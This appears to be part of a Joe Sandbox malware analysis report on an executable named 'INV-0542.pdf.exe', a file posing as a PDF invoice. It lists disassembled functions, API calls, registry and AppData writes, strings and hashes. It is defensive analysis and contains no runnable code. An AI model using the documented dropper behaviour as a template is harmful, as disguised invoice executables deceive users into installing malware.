Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: matrices
API String ID: 2531174081-3449136062
Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58

Function 004032D9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040333A
GetTickCount.KERNEL32 ref: 004033BB
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033E8
wsprintfW.USER32 ref: 004033FB

Strings

... %d%%, xrefs: 004033F5

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9

Function 004068C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
wsprintfW.USER32 ref: 00406917
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B

Strings

UXTHEME, xrefs: 004068CE
%s%S.dll, xrefs: 00406911

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798

Function 004024AF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(lftninger\slangetmmerens,00000023,00000011,00000002), ref: 004024FA
RegSetValueExW.KERNELBASE(?,?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 0040253A
RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622

Strings

lftninger\slangetmmerens, xrefs: 004024EB, 004024F9, 00402510, 00402524, 0040252F

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: lftninger\slangetmmerens
API String ID: 2655323295-458217052
Opcode ID: ad63a50b818fcea08fea4855f3ef13eab50eab8dbec4c944f94bf8ca7bbae644
Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
Opcode Fuzzy Hash: ad63a50b818fcea08fea4855f3ef13eab50eab8dbec4c944f94bf8ca7bbae644
Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668

Function 00406060 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040607E
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806), ref: 00406099

Strings

nsa, xrefs: 0040606D
C:\Users\user\AppData\Local\Temp\, xrefs: 00406065

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768

Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405EC9
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F

Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,?,00000000,000000F0), ref: 00401672

Strings

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 00401665

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis
API String ID: 1892508949-747733597
Opcode ID: 0975ff6eb310aa27d899ca9470ec3d9e9926d5528aa11726d624e4e1b9446680
Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
Opcode Fuzzy Hash: 0975ff6eb310aa27d899ca9470ec3d9e9926d5528aa11726d624e4e1b9446680
Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D

Function 0040640F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
RegCloseKey.ADVAPI32(?), ref: 00406460

Strings

: Completed, xrefs: 00406416

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94

Function 00407094 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45

Function 00407295 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45

Function 00406FAB Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45

Function 00406AB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45

Function 00406EFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45

Function 0040701C Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45

Function 00406F68 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45

Function 004025C3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 8d5b146921c23c5c32305bf675c8714087916087c3c12a48a2612aa1a4d71ea8
Instruction ID: c62eb347aa92c0fd77e7ee5b530510020135478b5af5e66508d185aa27a1e92b
Opcode Fuzzy Hash: 8d5b146921c23c5c32305bf675c8714087916087c3c12a48a2612aa1a4d71ea8
Instruction Fuzzy Hash: BE01BC71A04205BBEB149F94DE48AAFB668EF80308F10443EF001B21D0D7B84E41976D

Function 0040204F Relevance: 3.1, APIs: 2, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962

GetFileVersionInfoSizeW.KERNELBASE(0000000B,00000000,?,000000EE), ref: 00402065
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402084

Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
